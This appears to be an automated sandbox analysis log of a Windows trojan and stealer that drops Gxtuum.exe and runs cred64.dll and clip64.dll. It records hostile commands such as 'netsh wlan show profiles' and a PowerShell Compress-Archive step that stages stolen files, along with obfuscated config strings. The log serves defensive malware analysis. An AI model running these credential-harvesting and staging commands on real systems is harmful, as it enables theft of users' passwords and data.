Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002E51A0	0_2_002E51A0
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_00313310	0_2_00313310
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_003263C4	0_2_003263C4
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002E5450	0_2_002E5450
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_003264E4	0_2_003264E4
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0031D559	0_2_0031D559
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_00324737	0_2_00324737
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030BBB0	0_2_0030BBB0
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030FDCB	0_2_0030FDCB
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0031CDCD	0_2_0031CDCD
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_002E4EF0	0_2_002E4EF0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000E61F0	1_2_000E61F0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000EB700	1_2_000EB700
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000F9F31	1_2_000F9F31
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000E51A0	1_2_000E51A0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_00113310	1_2_00113310
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_001263C4	1_2_001263C4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000E5450	1_2_000E5450
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_001264E4	1_2_001264E4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0011D559	1_2_0011D559
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_00124737	1_2_00124737
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010BBB0	1_2_0010BBB0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010FDCB	1_2_0010FDCB
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0011CDCD	1_2_0011CDCD
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_000E4EF0	1_2_000E4EF0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000E51A0	2_2_000E51A0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000E61F0	2_2_000E61F0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_00113310	2_2_00113310
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_001263C4	2_2_001263C4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000E5450	2_2_000E5450
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_001264E4	2_2_001264E4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0011D559	2_2_0011D559
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_00124737	2_2_00124737
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010BBB0	2_2_0010BBB0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010FDCB	2_2_0010FDCB
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0011CDCD	2_2_0011CDCD
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_000E4EF0	2_2_000E4EF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B624DFB	11_2_00007FFD9B624DFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B6E7732	11_2_00007FFD9B6E7732
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C0531B0	12_2_6C0531B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C061AB1	12_2_6C061AB1

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 000E61F0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 0010AC60 appears 111 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 00112B28 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 00104640 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 0010A414 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 00118B3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 00103730 appears 65 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C0573B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C055D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C056B05 appears 47 times
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: String function: 0030AC60 appears 56 times
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: String function: 00304640 appears 136 times

Source: tOuVwTJrau.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@30/23@0/2

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Code function: 1_2_000EE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

1_2_000EE8D0

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

File created: C:\Users\user\AppData\Roaming\43266f2abbf198

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\43266f2abbf198987ad62d4962cf7134
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

File created: C:\Users\user\AppData\Local\Temp\ee29ea508b

Jump to behavior

Source: tOuVwTJrau.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main

Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E065DE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839577000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64.dll.1.dr, cred64[1].dll.1.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: tOuVwTJrau.exe	Virustotal: Detection: 70%
Source: tOuVwTJrau.exe	ReversingLabs: Detection: 65%

Source: tOuVwTJrau.exe	String found in binary or memory: " /add
Source: tOuVwTJrau.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: tOuVwTJrau.exe	String found in binary or memory: " /add /y
Source: tOuVwTJrau.exe	String found in binary or memory: " /add
Source: tOuVwTJrau.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

File read: C:\Users\user\Desktop\tOuVwTJrau.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tOuVwTJrau.exe "C:\Users\user\Desktop\tOuVwTJrau.exe"
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: edputil.dll	Jump to behavior
